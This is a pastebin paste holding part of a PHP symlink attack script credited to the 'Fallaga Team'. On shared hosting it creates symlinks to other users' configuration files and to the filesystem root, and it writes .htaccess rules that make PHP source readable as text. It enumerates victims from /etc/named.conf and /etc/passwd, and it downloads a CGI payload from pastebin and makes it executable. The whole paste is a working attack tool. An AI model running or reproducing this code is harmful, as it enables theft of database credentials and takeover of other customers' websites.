  511. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  512. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  513. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  514. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  515. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  516. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  517. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  518. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  519. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  520. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  521. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  522. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  523. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  524. }
  525. $dir = "sec1";
  526. @mkdir($dir);
  527. if($dir){
  528. } else {
  529. }
  530. $dir2 = "sec2";
  531. @mkdir($dir2);
  532. if($dir2){
  533. } else {
  534. }
  535. $dir3 = "sec3";
  536. @mkdir($dir3);
  537. if($dir3){
  538. } else {
  539. }
  540. $dir4 = "sec4";
  541. @mkdir($dir4);
  542. if($dir4){
  543. } else {
  544. }
  545. $dir5 = "sec5";
  546. @mkdir($dir5);
  547. if($dir5){
  548. } else {
  549. }
  550. $dir6 = "sec6";
  551. @mkdir($dir6);
  552. if($dir6){
  553. } else {
  554. }
  555. $dir7 = "sec7";
  556. @mkdir($dir7);
  557. if($dir7){
  558. } else {
  559. }
  560.  
  561.  
  562.  
  563. $sec1 = "sec1/.htaccess";
  564. $hsec1 = fopen($sec1, 'w') or die("Error: Can't open file");
  565. $con1 = "Options Indexes FollowSymLinks
  566. DirectoryIndex ssssss.htm
  567. AddType txt .php
  568. AddHandler txt .php
  569. AddType txt .html
  570. AddHandler txt .html
  571. Options all
  572. Options
  573. Allow from all
  574. Require None
  575. Satisfy Any";
  576. fwrite($hsec1, $con1);
  577. fclose($hsec1);
  578.  
  579.  
  580.  
  581. $sec2 = "sec2/.htaccess";
  582. $hsec2 = fopen($sec2, 'w') or die("Error: Can't open file");
  583. $con2 = "Options +FollowSymLinks
  584. DirectoryIndex seees.html
  585. RemoveHandler .php
  586. AddType application/octet-stream .php ";
  587. fwrite($hsec2, $con2);
  588. fclose($hsec2);
  589.  
  590.  
  591. $sec3 = "sec3/.htaccess";
  592. $hsec3 = fopen($sec3, 'w') or die("Error: Can't open file");
  593. $con3 = "Options +FollowSymLinks
  594. DirectoryIndex Index.html
  595. Options +Indexes
  596. AddType text/plain .php
  597. AddHandler server-parsed .php";
  598. fwrite($hsec3, $con3);
  599. fclose($hsec3);
  600.  
  601. $sec4 = "sec4/.htaccess";
  602. $hsec4 = fopen($sec4, 'w') or die("Error: Can't open file");
  603. $con4 = "Options Indexes FollowSymLinks
  604. DirectoryIndex ssssss.htm
  605. AddType txt .php
  606. AddHandler txt .php";
  607. fwrite($hsec4, $con4);
  608. fclose($hsec4);
  609.  
  610. $sec5 = "sec5/.htaccess";
  611. $hsec5 = fopen($sec5, 'w') or die("Error: Can't open file");
  612. $con5 = "Options all
  613. DirectoryIndex Sux.html
  614. AddType text/plain .php
  615. AddHandler server-parsed .php
  616. AddType text/plain .html";
  617. fwrite($hsec5, $con5);
  618. fclose($hsec5);
  619.  
  620.  
  621. $sec6 = "sec6/.htaccess";
  622. $hsec6 = fopen($sec6, 'w') or die("Error: Can't open file");
  623. $con6 = "Options +FollowSymLinks
  624. DirectoryIndex Sux.html
  625. Options +Indexes
  626. AddType text/plain .php
  627. AddHandler server-parsed .php
  628. AddType text/plain .html";
  629. fwrite($hsec6, $con6);
  630. fclose($hsec6);
  631.  
  632. $sec7 = "sec7/.htaccess";
  633. $hsec7 = fopen($sec7, 'w') or die("Error: Can't open file");
  634. $con7 = "Options Indexes FollowSymLinks
  635. AddType text/plain .php .inc .asp .php3
  636. Options All
  637. Options All";
  638. fwrite($hsec7, $con7);
  639. fclose($hsec7);
  640.  
  641.  
  642. for ($k=1;$k<8;$k++){
  643. if("$fp$k"){
  644. chdir('sec'.$k);
  645. system('ln -s / 1.txt');
  646. chdir('../');
  647. }
  648. else{ echo "Error";
  649. }
  650. }
  651.  
  652.  
  653. if(isset($_REQUEST['OPT']))
  654. {
  655. switch ($_REQUEST['OPT'])
  656. {
  657. case '1';
  658. echo "<center><table border='1' align='center' width='80%'><h3><td><a>Domains</td></a><td><a>User</a></td><td><a>Sym</a></td></h3></center>";
  659. if(!is_file('DATA.txt')){
  660. $named = @file("/etc/named.conf");
  661. }else{
  662. $named = @file("DATA.txt");
  663. }
  664. if(!$named)
  665. {
  666.  
  667. die ("</br></br><center><h2><a>ERROR !</a></h2></center>");
  668. }
  669. else
  670. {
  671. foreach($named as $dom){
  672. preg_match_all('#zone "(.*)"#', $dom, $doms);
  673. if(strlen(trim($doms[1][0])) > 2){
  674. $user = posix_getpwuid(@fileowner("/etc/valiases/".$doms[1][0]));
  675. echo "<tr><td><a href=http://www.".$doms[1][0]."/>".$doms[1][0]."</a></td><td><a>".$user['name']."</a></td><td><a href='sec1/1.txt/home/".$user['name']."/public_html/' >Sym1</a>~<a href='sec2/1.txt/home/".$user['name']."/public_html/' >Sym2</a>~<a href='sec3/1.txt/home/".$user['name']."/public_html/' >Sym3</a>~<a href='sec4/1.txt/home/".$user['name']."/public_html/' >Sym4</a>~<a href='sec5/1.txt/home/".$user['name']."/public_html/' >Sym5</a>~<a href='sec6/1.txt/home/".$user['name']."/public_html/' >Sym6</a>~<a href='sec7/1.txt/home/".$user['name']."/public_html/' >Sym7</a></td></tr>";
  676. }
  677. }
  678. }
  679. break;
  680. case '2';
  681. echo "<center><table border='1' align='center' width='80%'><h3><td><a>User</td></a><td><a>Sym</a></td></h3></center>";
  682. $file = file('/etc/passwd');
  683. if(!$file)
  684. {
  685.  
  686. die ("</br></br><center><h2><a>ERROR !</a></h2></center>");
  687. }
  688. else
  689. {
  690. foreach ($file as $f){
  691.  
  692. $u=explode(':', $f);
  693. $user = $u['0'];
  694. echo "<tr><td>".$user."</td><td><a href='sec1/1.txt/home/".$user."/public_html/' >Sym1</a>~<a href='sec2/1.txt/home/".$user."/public_html/' >Sym2</a>~<a href='sec3/1.txt/home/".$user."/public_html/' >Sym3</a>~<a href='sec4/1.txt/home/".$user."/public_html/' >Sym4</a>~<a href='sec5/1.txt/home/".$user."/public_html/' >Sym5</a>~<a href='sec6/1.txt/home/".$user."/public_html/' >Sym6</a>~<a href='sec7/1.txt/home/".$user."/public_html/' >Sym7</a></td></tr>";
  695. }
  696. }
  697. break;
  698. case '3';
  699. $dir = 'prodigy';
  700. @mkdir($dir);
  701. if($dir){
  702. echo '<br> prodigy Has Been Created ~';
  703. } else {
  704. echo '<br> [-] Error !';
  705. }
  706. $htaccess = 'http://pastebin.com/raw.php?i=XBLhdvbQ';
  707. $file = file_get_contents($htaccess);
  708. $open = fopen('prodigy/.htaccess' , 'w');
  709. fwrite($open,$file);
  710. fclose($open);
  711. if($open) {
  712. echo '<br> [htaccess] => Has Been Created ~';
  713. } else {
  714. echo "<br>[+] Error !";
  715. }
  716. $con = 'http://pastebin.com/raw.php?i=sk8JEgq0';
  717. $file = file_get_contents($con);
  718. $open = fopen('prodigy/con.cpc' , 'w');
  719. fwrite($open,$file);
  720. fclose($open);
  721. if($open) {
  722. echo '<br> [cgi] => Has Been Created !';
  723. } else {
  724. echo '<br>[-] Error !';
  725. }
  726.  
  727.  
  728. $ch = 'prodigy/con.cpc';
  729. chmod($ch, 0755);
  730. if($cgip){
  731. echo '<br>[+] => CHMOD To 755 Complate ~';
  732. } else {
  733. }
  734.  
  735. echo ('<meta http-equiv="refresh" content="0; url=prodigy/con.cpc" />');
  736. echo ('Please Whait . ');
  737.  
  738. break;
  739. case '4';
  740. mkdir("CONprodigy");
  741. chdir("CONprodigy");
  742. $temp = "";
  743. $val1 = 0;
  744. $val2 = 1000;
  745. for(;$val1 <= $val2;$val1++)
  746. {
  747. $uid = @posix_getpwuid($val1);
  748. if ($uid)
  749. $temp .= join(':',$uid)."
  750. ";
  751. }
  752. echo '<br/>';
  753. $temp = trim($temp);
  754.  
  755. $file5 = fopen("prodigyTMP.txt","w");
  756. fputs($file5,$temp);
  757. fclose($file5);
  758.  
  759. $file = fopen("prodigyTMP.txt", "r") or exit("Unable to open file!");
  760. while(!feof($file))
  761. {
  762. $s = fgets($file);
  763. $matches = array();
  764. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  765. $matches = str_replace("home/","",$matches[1]);
  766. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  767. continue;
  768. syml($matches,$matches);
  769. }
  770. fclose($file);
  771.  
  772. $ht = 'Options Indexes FollowSymLinks
  773. Options +Indexes
  774. AddType txt .php
  775. AddHandler txt .php';
  776. $open2 = fopen('.htaccess' , 'w');
  777. fwrite($open2,$ht);
  778. fclose($open2);
  779. echo "</table>";
  780. unlink("prodigyTMP.txt");
  781. echo ('<meta http-equiv="refresh" content="0; url=CONprodigy" />');
  782.  
  783. break;
  784. }
  785. } else {
  786. echo "</br>";
  787. echo "</br>";
  788. echo "<center> By Prodigy Tn Team Fallaga Team </center>"; }
  789.  
  790.  
  791. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement